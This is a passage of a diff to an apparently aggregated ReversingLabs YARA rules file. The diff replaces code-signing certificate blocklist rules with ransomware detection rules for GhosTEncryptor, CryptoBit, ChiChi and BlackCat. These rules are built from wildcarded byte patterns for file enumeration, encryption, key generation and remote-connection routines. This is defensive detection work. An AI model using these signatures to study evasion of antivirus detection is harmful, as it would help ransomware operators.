+            35 ?? ?? ?? ?? 48 89 14 24 48 89 5C 24 ?? 48 89 74 24 ?? 48 8B 54 24 ?? 48 29 C2 48
+            89 D3 48 F7 DA 48 C1 FA ?? 48 21 C2 48 8B B4 24 ?? ?? ?? ?? 48 01 F2 48 89 54 24 ??
+            48 29 C1 48 89 4C 24 ?? 48 89 5C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ??
+            48 8B 54 24 ?? 48 8B 5C 24 ?? 48 85 DB 74 ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 8C 24 ??
+            ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48
+            81 C4 ?? ?? ?? ?? C3 48 8B 9C 24 ?? ?? ?? ?? 48 89 1C 24 48 89 44 24 ?? 48 89 4C 24
+            ?? 48 89 54 24 ?? E8 ?? ?? ?? ?? 48 8B 84 24
+        }
+		$find_files = {
+            65 48 8B 0C 25 ?? ?? ?? ?? 48 8B 89 ?? ?? ?? ?? 48 3B 61 ?? 0F 86 ?? ?? ?? ?? 48 83
+            EC ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? 48 C7 04 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ??
+            48 89 44 24 ?? 48 8B 8C 24 ?? ?? ?? ?? 48 89 4C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 89 54
+            24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 89 54
+            24 ?? 48 89 5C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 89 54 24 ?? 48 C7 44 24 ?? ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 44 24 ?? 48 8B 4C 24 ?? 48 89 4C 24 ?? 48 8B 94
+            24 ?? ?? ?? ?? 48 89 14 24 48 8B 9C 24 ?? ?? ?? ?? 48 89 5C 24 ?? 48 89 44 24 ?? 48
+            89 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8B 84 24 ??
+            ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 89 04 24 48 89 4C 24 ?? 48 C7 44 24 ?? ?? ?? ??
+            ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 85 C9 75
+            ?? 48 89 44 24 ?? 48 89 04 24 E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 85 C0 74 ?? 48 8B 44
+            24 ?? 48 89 04 24 E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 48 8B 6C 24 ?? 48 83 C4 ??
+            C3 48 8B 44 24 ?? 48 89 04 24 E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 48 8B 6C 24 ??
+            48 83 C4 ?? C3 48 89 04 24 E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 48 8B 6C 24 ?? 48
+            83 C4 ?? C3 48 8B 44 24
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dmitrij Emelyanov" and pe.signatures [ i ] . serial == "74:73:d9:54:05:d2:b0:b3:a8:f2:87:85:ce:6e:74:ca" and 1453939199 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( $drop_ransom_note )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_04F380F97579F1702A85E0169Bbdfd78 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Ghostencryptor : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects GhosTEncryptor ransomware."
 		author = "ReversingLabs"
-		id = "860027ff-2df2-5519-afde-60ebee270290"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "9f035e39-e0fe-54f3-8206-08fbbd9206b4"
+		date = "2021-08-12"
+		modified = "2021-08-12"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1906-L1922"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.GhosTEncryptor.yara#L1-L69"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "73dc6e36fdaf5c80b33f20f2a9157805ce1d0218f3898104de16522ee9cfd51b"
+		logic_hash = "85c1f6e5acf746388b0a9ddeb1f0ad1d2219fff7358c9a981849863155c13e3c"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "GhosTEncryptor"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$enum_folders = {
+            17 8D ?? ?? ?? ?? 0A 06 16 72 ?? ?? ?? ?? A2 03 28 ?? ?? ?? ?? 0B 16 0C 38 ?? ?? ?? ??
+            07 08 9A 0D 02 09 28 ?? ?? ?? ?? 2C ?? 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 09 72 ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 09 72 ?? ?? ?? ??
+            6F ?? ?? ?? ?? 2D ?? 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 09 72 ?? ?? ?? ?? 6F ?? ??
+            ?? ?? 2D ?? 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 02 02 7B ?? ?? ?? ?? 09 72 ?? ?? ??
+            ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 09 28 ?? ?? ?? ?? 26 08 17 58 0C 08 07 8E 69 3F ??
+            ?? ?? ?? 02 7B ?? ?? ?? ?? 06 17 6F ?? ?? ?? ?? 2A
+        }
+		$encrypt_folder_p1 = {
+            1F ?? 8D ?? ?? ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 72 ?? ?? ??
+            ?? A2 25 19 72 ?? ?? ?? ?? A2 25 1A 72 ?? ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 25 1C 72
+            ?? ?? ?? ?? A2 25 1D 72 ?? ?? ?? ?? A2 25 1E 72 ?? ?? ?? ?? A2 25 1F ?? 72 ?? ?? ?? ??
+            A2 25 1F ?? 72 ?? ?? ?? ?? A2 25 1F ?? 72
+        }
+		$encrypt_folder_p2 = {
+            A2 0A 03 28 ?? ?? ?? ?? 0B 03 28 ?? ?? ?? ?? 0C 16 0D 2B ?? 07 09 9A 28 ?? ?? ?? ?? 13
+            ?? 06 11 ?? 28 ?? ?? ?? ?? 2C ?? 02 07 09 9A 04 28 ?? ?? ?? ?? 09 17 58 0D 09 07 8E 69
+            32 ?? 16 13 ?? 2B ?? 02 08 11 ?? 9A 04 28 ?? ?? ?? ?? 11 ?? 17 58 13 ?? 11 ?? 08 8E 69
+            32 ?? 2A
+        }
+		$deep_search_p1 = {
+            17 8D ?? ?? ?? ?? 0A 06 16 72 ?? ?? ?? ?? A2 7E ?? ?? ?? ?? 0B 02 0C 16 0D 38 ?? ?? ??
+            ?? 08 09 9A 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 72
+            ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ??
+            ?? ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 11 ?? 72
+        }
+		$deep_search_p2 = {
+            6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 07 11 ?? 72 ?? ?? ?? ?? 28
+            ?? ?? ?? ?? 0B 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 09 17 58 0D 09 08 8E
+            69 3F ?? ?? ?? ?? 07 06 17 6F ?? ?? ?? ?? 2A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GRANIFLOR" and pe.signatures [ i ] . serial == "04:f3:80:f9:75:79:f1:70:2a:85:e0:16:9b:bd:fd:78" and 1454889599 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $enum_folders ) and ( all of ( $deep_search_p* ) ) and ( all of ( $encrypt_folder_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_04D6B8Cc6Dce353Fcf3Ae8A532Be7255 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Cryptobit : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects CryptoBit ransomware."
 		author = "ReversingLabs"
-		id = "937dd780-52f7-5f27-ac2e-a0245997d449"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "8566e516-9884-5b20-90c4-7ed38fa96999"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1924-L1940"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.CryptoBit.yara#L1-L113"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a316ad7f554428d02a850fb3bb04f349d30ecd2ccd4597e7a63461bf5e866e6f"
+		logic_hash = "ccc8a0f1c5e11211649992d0f2b309968c97b49f1c7359e62d622f364e117429"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "CryptoBit"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_p1 = {
+            55 8B EC 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83
+            7D ?? ?? 75 ?? FF 75 ?? EB ?? 6A ?? 59 83 C9 ?? 83 F1 ?? 89 4D ?? 6A ?? 6A ?? 6A ??
+            6A ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 0B C0 0F 84 ?? ?? ?? ?? 89 45 ?? 60 BE ?? ?? ??
+            ?? 56 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 33 D2
+            8B 0D ?? ?? ?? ?? F7 F1 0B C0 74 ?? FF 35 ?? ?? ?? ?? EB ?? 52 8B 0C 24 29 4D ?? 51
+            FF 75 ?? 6A ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 0B C0 74 ?? 89 45 ?? 51 FF
+            75 ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? 83 7D ?? ?? 75 ?? 89 45 ?? 89 4D ?? FF 75 ??
+            E8 ?? ?? ?? ?? EB ?? EB ?? 83 7D ?? ?? 75 ?? C7 45 ?? ?? ?? ?? ?? EB ?? A1 ?? ?? ??
+            ?? 01 45 ?? EB ?? EB ?? 8B 64 24 ?? 64 8F 05 ?? ?? ?? ?? 83 C4 ?? 61 EB ?? EB ?? 64
+            8F 05 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 8B 4D
+            ?? EB ?? 8B 45 ?? C9 C2
+        }
+		$encrypt_files_p2 = {
+            55 8B EC 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A
+            ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 84 ??
+            ?? ?? ?? 89 45 ?? 8D 45 ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? E8 ?? ?? ?? ??
+            0B C0 74 ?? E9 ?? ?? ?? ?? 89 45 ?? 8B 15 ?? ?? ?? ?? 8B 4D ?? 0B C9 75 ?? 83 F8 ??
+            73 ?? E9 ?? ?? ?? ?? EB ?? 0B C9 75 ?? 3B C2 73 ?? 50 EB ?? 52 8F 45 ?? 83 7D ?? ??
+            75 ?? A1 ?? ?? ?? ?? 39 45 ?? 72 ?? FF 75 ?? FF 75 ?? FF 75 ?? FF 75 ?? E8 ?? ?? ??
+            ?? 89 45 ?? 0B C0 74 ?? 6A ?? 50 51 FF 75 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 6A
+            ?? 6A ?? 6A ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 0B C0 74 ?? 89 45 ?? 60 BE ?? ?? ?? ??
+            56 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? FF 75 ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF
+            75 ?? E8 ?? ?? ?? ?? 0B C0 74 ?? 50 8B 4D ?? 8B 04 24 83 C9 ?? 83 F1 ?? 51 50 E8 ??
+            ?? ?? ?? 89 45 ?? 0B C0 74 ?? 6A ?? 50 51 FF 75 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB
+            ?? 8B 64 24 ?? 64 8F 05 ?? ?? ?? ?? 83 C4 ?? 61 EB ?? EB ?? 64 8F 05 ?? ?? ?? ?? 83
+            C4 ?? 83 7D ?? ?? 74 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? E8 ?? ??
+            ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 8B 4D ?? EB ?? 33 C0 33 C9 C9 C2
+        }
+		$find_files_p1 = {
+            55 8B EC 83 C4 ?? 57 56 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 8B 75 ?? 83 7E ?? ?? 75 ?? E8 ?? ?? ?? ?? 50 8D 46 ?? 50 E8
+            ?? ?? ?? ?? 23 C0 0F 84 ?? ?? ?? ?? EB ?? 83 7E ?? ?? 75 ?? FF 35 ?? ?? ?? ?? 8D 46
+            ?? 50 E8 ?? ?? ?? ?? 23 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 23 C0 0F
+            84 ?? ?? ?? ?? 89 45 ?? B9 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 23 C0 0F 84 ??
+            ?? ?? ?? 89 45 ?? 8B 75 ?? 8B 7D ?? 68 ?? ?? ?? ?? 57 56 E8 ?? ?? ?? ?? 8D 57 ?? 8B
+            47 ?? D1 E0 C7 04 10 ?? ?? ?? ?? C6 44 10 ?? ?? FF 75 ?? 8D 47 ?? 50 E8 ?? ?? ?? ??
+            83 F8 ?? 0F 84 ?? ?? ?? ?? 89 45 ?? 8B 55 ?? 8B 75 ?? 8B 7D ?? 8B 02 25 ?? ?? ?? ??
+            0F 85 ?? ?? ?? ?? 8B 02 83 E0 ?? 0F 85 ?? ?? ?? ?? 8B 02 83 E0 ?? F7 02 ?? ?? ?? ??
+            0F 85 ?? ?? ?? ?? 8D 47 ?? 50 8D 46 ?? 50 E8 ?? ?? ?? ?? 8B 55 ?? 8D 42 ?? 50 8D 47
+            ?? 50 E8 ?? ?? ?? ?? 8D 47 ?? 50 E8 ?? ?? ?? ?? 8B 55 ?? 89 47 ?? F7 02 ?? ?? ?? ??
+            74 ?? 68 ?? ?? ?? ?? 8D 47 ?? 50 E8 ?? ?? ?? ?? FF 77 ?? 8D 47 ?? 50 E8 ?? ?? ?? ??
+            83 F8 ?? 74 ?? 83 F8 ?? 75 ?? 48 50 FF 76 ?? 8D 47 ?? 50 E8 ?? ?? ?? ?? 0B C0 75
+        }
+		$find_files_p2 = {
+            0B C9 74 ?? FF 45 ?? E9 ?? ?? ?? ?? 83 7A ?? ?? 0F 84 ?? ?? ?? ?? 81 7A ?? ?? ?? ??
+            ?? 0F 84 ?? ?? ?? ?? F7 02 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? F7 02 ?? ?? ?? ?? 0F 85 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 74 ?? 8B F8 FF 76 ?? 8F 47 ?? FF 76 ??
+            8F 47 ?? FF 36 8F 07 8D 47 ?? 50 8D 46 ?? 50 E8 ?? ?? ?? ?? 8B 55 ?? 8D 42 ?? 50 8D
+            47 ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 47 ?? 50 E8 ?? ?? ?? ?? 8D 47 ?? 50 E8 ??
+            ?? ?? ?? 89 47 ?? 83 3F ?? 75 ?? 57 68 ?? ?? ?? ?? FF 76 ?? E8 ?? ?? ?? ?? 0B C0 75
+            ?? 57 E8 ?? ?? ?? ?? EB ?? 57 E8 ?? ?? ?? ?? EB ?? E9 ?? ?? ?? ?? FF 75 ?? FF 75 ??
+            E8 ?? ?? ?? ?? 0B C0 0F 85 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
+            8B 75 ?? 83 7D ?? ?? 74 ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B
+            14 24 51 50 52 8D 46 ?? 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 D1 E1 8B 5C 24 ?? 51 50 53 8D 46
+            ?? 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? E8 ??
+            ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? E8 ??
+            ?? ?? ?? 8B 45 ?? 5E 5F C9 C2
+        }
+		$remote_connection = {
+            55 8B EC 81 C4 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ??
+            6A ?? E8 ?? ?? ?? ?? 23 C0 89 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A
+            ?? 6A ?? 6A ?? FF 75 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 89 85 ?? ?? ?? ?? 0F
+            84 ?? ?? ?? ?? 8D 5D ?? C7 03 ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ??
+            ?? ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 45 ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 74 ?? 6A ?? 6A ?? 6A ?? 6A ?? FF B5 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 23 C0 74 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 23 C0 89 85 ?? ?? ?? ?? 74 ??
+            8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? FF B5 ?? ?? ?? ?? 0B C0 74 ?? 83 BD ?? ?? ?? ?? ?? 74 ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ??
+            FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? C9 C2
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MADERA" and pe.signatures [ i ] . serial == "04:d6:b8:cc:6d:ce:35:3f:cf:3a:e8:a5:32:be:72:55" and 1451692799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $remote_connection and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_191322A00200F793 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Chichi : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects ChiChi ransomware."
 		author = "ReversingLabs"
-		id = "4011e54c-ca28-536f-8759-077fcce6d45f"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "95062789-a55d-5c1c-a359-206b58f311e5"
+		date = "2022-02-14"
+		modified = "2022-02-14"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1942-L1958"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.ChiChi.yara#L1-L66"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1b816785f86189817c124636e50a0f369ec85cfd898223c4ba43758a877f1cf3"
+		logic_hash = "863a30e4c708e13ea0f4c6ad42a919de463926508783d6552c0cec746730baa5"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "ChiChi"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$generate_key = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 57 A1 ?? ?? ?? ??
+            33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B D9 8B 7D ?? C7 45 ?? ?? ?? ?? ?? 89 7D ?? 85
+            FF 75 ?? 33 F6 EB ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 89 75 ?? 6A ?? 8D 4D ?? C7 45
+            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 56 8D
+            4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? 85 C0 74
+            ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B 03 8B CB 57 56 FF 50 ?? C7 45 ?? ?? ?? ?? ?? 85 F6
+            74 ?? 83 FF ?? 8D 45 ?? 8D 4D ?? 8B FE 0F 46 C8 32 C0 56 8B 09 F3 AA E8 ?? ?? ?? ??
+            83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C2
+        }
+		$encrypt_files = {
+            55 8B EC 51 53 56 57 8B D9 68 ?? ?? ?? ?? 53 89 5D ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ??
+            ?? ?? 53 FF D6 68 ?? ?? ?? ?? 8B F8 FF D6 8B 1D ?? ?? ?? ?? 03 F8 03 FF 83 C7 ?? 57
+            6A ?? FF 35 ?? ?? ?? ?? FF D3 8B F0 85 F6 74 ?? 8B 7D ?? 57 56 FF 15 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 56 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 5B
+            8B E5 5D C3 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ??
+            ?? 56 6A ?? FF 35 ?? ?? ?? ?? 8B F8 FF 15 ?? ?? ?? ?? 83 FF ?? 74 ?? 8B CF E8 ?? ??
+            ?? ?? 5F 5E 5B 8B E5 5D C3 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3
+        }
+		$find_files = {
+            6A ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 56 FF 15 ??
+            ?? ?? ?? 56 FF 15 ?? ?? ?? ?? FF 74 24 ?? 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF
+            D7 8D 44 24 ?? 50 53 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84
+            ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 33 F6 FF B6 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ??
+            ?? 85 C0 0F 84 ?? ?? ?? ?? 83 C6 ?? 81 FE ?? ?? ?? ?? 72 ?? FF 74 24 ?? 8B 74 24 ??
+            56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 56 FF 15 ??
+            ?? ?? ?? F6 44 24 ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ??
+            ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 83 E8 ?? 78 ?? 66 83
+            7C 44 ?? ?? 74 ?? 83 E8 ?? 79 ?? EB ?? 8D 74 24 ?? 8D 34 46 68 ?? ?? ?? ?? 56 FF 15
+            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PRABHAKAR NARAYAN" and pe.signatures [ i ] . serial == "19:13:22:a0:02:00:f7:93" and 1442966399 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $generate_key ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_451C9D0B413E6E8Df175 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Blackcat : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects BlackCat ransomware."
 		author = "ReversingLabs"
-		id = "adc832c0-166d-52d1-aeec-2fc92ff52d02"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "e623340d-8df8-5f13-b75f-379bd0038f64"
+		date = "2022-02-14"
+		modified = "2022-02-14"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1960-L1976"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.BlackCat.yara#L1-L109"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
